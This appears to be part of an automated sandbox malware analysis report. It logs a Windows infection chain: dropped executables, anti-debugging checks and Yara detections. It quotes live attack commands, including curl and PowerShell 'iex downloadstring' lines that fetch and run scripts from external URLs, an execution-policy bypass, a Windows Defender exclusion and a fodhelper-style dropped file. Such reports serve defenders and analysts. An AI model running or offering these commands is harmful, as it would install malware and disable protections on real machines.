            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9939Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9895Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9798Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9858Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Windows \System32\fodhelper.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\_kjfech8_V\_kjfech8_V.exe (copy)Jump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\_kjfech8_V\exe.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\_kjfech8_V\MSVCR100.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\_kjfech8_V\WebView2Loader.dll (copy)Jump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\_kjfech8_V\WebView2Loader.txtJump to dropped file
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeAPI coverage: 0.2 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep count: 9939 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004Thread sleep count: 9895 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4384Thread sleep count: 9858 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDCEFE1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDD0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDD0F84
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDD0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDD0B33
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,9_2_6FDCCA9B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,9_2_6FDCC775
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDD0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDD0702
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,9_2_6FDCDF35
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDCFD86
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD97C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FD97C6D
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode,9_2_6FDCDA38
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDCF8B5
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,9_2_6FDCD4FF
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDCF40B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCEFE1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDD0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDD0F84
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDD0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDD0B33
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,11_2_6FDCCA9B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,11_2_6FDCC775
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDD0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDD0702
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,11_2_6FDCDF35
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCFD86
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD97C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FD97C6D
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode,11_2_6FDCDA38
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCF8B5
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,11_2_6FDCD4FF
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCF40B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDF6C74 _resetstkoflw,VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_6FDF6C74
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
            Source: curl.exe, 00000002.00000003.29379278870.000001AA88AA3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000002.29379756087.000001AA88AA3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.29379139326.000001AA88AA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess queried: DebugPortJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess queried: DebugPortJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_00D01000 getenv,printf,printf,__argc,__argv,printf,__argc,GetCommandLineA,JLI_CmdToArgs,JLI_GetStdArgc,JLI_MemAlloc,JLI_GetStdArgs,LdrInitializeThunk,JLI_Launch,11_2_00D01000
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_00D017CE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,9_2_00D017CE
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDF6C74 VirtualProtect ?,-00000001,00000104,?9_2_6FDF6C74
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDFB67F _encoded_null,LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,9_2_6FDFB67F
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDF9C3F GetProcessHeap,HeapAlloc,_errno,_errno,GetProcessHeap,HeapFree,__doserrno,_errno,_get_osfhandle,SetEndOfFile,_errno,__doserrno,GetLastError,9_2_6FDF9C3F
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_00D017CE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,9_2_00D017CE
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDFADFC _crt_debugger_hook,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,9_2_6FDFADFC
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD80807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,9_2_6FD80807
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDFC16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,9_2_6FDFC16F
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_00D017CE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,11_2_00D017CE
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDFADFC _crt_debugger_hook,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,11_2_6FDFADFC
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD80807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,11_2_6FD80807
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDFC16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,11_2_6FDFC16F

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: amsi64_6872.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_7380.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: curl.exe PID: 6132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6872, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\Public\Documents\vs1.ps1, type: DROPPED
            Adds a directory exclusion to Windows Defender
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V"
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V"Jump to behavior
            Bypasses PowerShell execution policy
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1]; ".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\_kjfech8_V\_kjfech8_Vi7.exe "C:\_kjfech8_V\_kjfech8_Vi7.exe" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\shutdown.exe "C:\Windows\system32\shutdown.exe" /r /t 10Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -win 1 -Jump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -command "$psakedir = ([array](dir """c:\users\user\desktop\vendor\packages\psake.*"""))[-1]; ".$psakedir\tools\psake.ps1" build.psake.ps1 -scriptpath "$psakedir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -command "$psakedir = ([array](dir """c:\users\user\desktop\vendor\packages\psake.*"""))[-1]; ".$psakedir\tools\psake.ps1" build.psake.ps1 -scriptpath "$psakedir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }"Jump to behavior
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A2B4E000.00000004.00000800.00020000.00000000.sdmp, _kjfech8_Vi7.exe, 0000000B.00000002.29806435683.000000006C6D4000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: @Winapi@Windows@DOF_PROGMAN
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,_invoke_watson,9_2_6FD8888A
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,9_2_6FD8871C
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,9_2_6FD886FD
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,9_2_6FD865F0
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,9_2_6FD885AC
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,_mbsnbicoll,strlen,EnumSystemLocalesA,strcpy_s,_invoke_watson,9_2_6FD88468
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: strlen,EnumSystemLocalesA,9_2_6FDFF42E
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: strlen,strlen,EnumSystemLocalesA,9_2_6FDFF3C7
